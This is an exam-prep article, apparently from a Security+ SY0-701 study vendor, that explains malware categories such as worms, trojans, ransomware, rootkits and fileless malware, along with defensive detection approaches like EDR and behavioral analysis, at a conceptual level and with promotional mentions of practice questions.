Malware Types Explained for Security+ 701

Malware types for the Security+ 701 exam include worms (self-replicating), trojans (disguised as legitimate software), and ransomware (encrypting data for payment). Advanced threats like rootkits, bootkits, and fileless malware use stealth and system binaries to evade detection, requiring a combination of behavioral analysis and endpoint detection and response (EDR) tools.

What is the difference between worms, trojans, and ransomware?

When you're staring at a Security+ scenario, the first thing you need to identify is the delivery and propagation method. Worms are the 'loners' of the malware world; they are self-replicating and spread across networks without any human interaction by exploiting vulnerabilities like SMB. If the question mentions 'rapid spread across the subnet,' think worm.

Trojans, conversely, rely on deception. They masquerade as helpful software—like a free PDF converter—to trick you into executing them. Unlike worms, they don't self-replicate. Ransomware is the 'extortionist,' using asymmetric encryption to lock your files and demanding payment. To master these distinctions, we recommend drilling through our 1,000 expert-curated practice questions, which force you to apply these definitions to real-world attack scenarios.

How do rootkits and bootkits evade detection?

These are the 'ninjas' of malware. A rootkit targets the OS kernel or replaces system binaries to hide its presence. If you ask the OS 'What processes are running?', the rootkit intercepts that request and removes itself from the list before you see it. This is why standard antivirus often fails; the malware is lying to the tool.

Bootkits take this a step further by infecting the Master Boot Record (MBR) or the UEFI firmware. Because they load before the operating system even starts, they can compromise the entire boot sequence. To defend against these, you need hardware-rooted trust, such as Secure Boot and TPM. In your studies, focus on the concept of 'persistence'—these tools aren't just about stealing data; they're about staying hidden for months or years.

What exactly is fileless malware and LotL?

Modern attackers have realized that writing a .exe file to a disk is a great way to get caught by an EDR. Enter fileless malware. This threat resides entirely in RAM, often using scripts (PowerShell, VBScript) to execute malicious commands. Because there is no 'file' to scan, traditional signature-based AV is practically useless.

This leads us to 'Living-off-the-Land' (LotL) binaries. Attackers use legitimate, pre-installed system tools—like certutil.exe or wmic.exe—to perform malicious actions. They aren't bringing their own tools; they're using yours against you. To catch this, you must move from signature-based detection to behavioral analysis. Look for unusual parent-child process relationships, such as a Word document launching a PowerShell instance.

How do you distinguish spyware from adware?

While both are often bundled together, their goals are different. Adware is primarily about revenue. It floods your browser with pop-ups and redirects your search queries to affiliate sites. It's annoying and degrades performance, but it's rarely the primary goal of a sophisticated APT.

Spyware is far more sinister. Its goal is covert data exfiltration. This includes keyloggers that capture your passwords or screen scrapers that monitor your activity. Detection usually involves spotting unexpected outbound traffic to unknown Command and Control (C2) servers or noticing unexplained CPU spikes. When studying for the 701, remember that removal often requires booting into Safe Mode or using an offline scanner to prevent the malware from protecting its own registry keys.

Which detection strategies work best for modern malware?

You cannot rely on a single tool. Signature-based detection is great for 'known' threats, but it's useless against polymorphic malware that changes its code to evade hashes. This is why the SY0-701 exam emphasizes heuristic and behavioral analysis—looking for 'malware-like' activity rather than a specific file fingerprint.

Implementing Endpoint Detection and Response (EDR) is the gold standard here. EDR provides the visibility needed to track fileless attacks and LotL binaries by logging every process execution and network connection. At Cert Sensei, we provide domain-level analytics in our practice exams so you can see exactly where your knowledge gaps are in the 'Threats, Attacks, and Vulnerabilities' domain, ensuring you don't walk into the exam with a blind spot.

How should you approach malware questions on the SY0-701 exam?

The CompTIA exams love to give you a story. To win, you need to identify the 'trigger words.' If the scenario mentions 'encrypted files' and 'Bitcoin,' it's ransomware. If it mentions 'unauthorized access to the kernel,' it's a rootkit. If it mentions 'spreading via a network vulnerability without user interaction,' it's a worm.

Read the delivery mechanism carefully. A phishing email with a 'free tool' attachment is a classic Trojan delivery. Once you identify the type, look for the most appropriate remediation. For ransomware, the answer is almost always 'restore from offline backups' after isolating the host. Practice these patterns repeatedly using our custom quiz builder to filter specifically for malware-related objectives.

❓ Frequently Asked Questions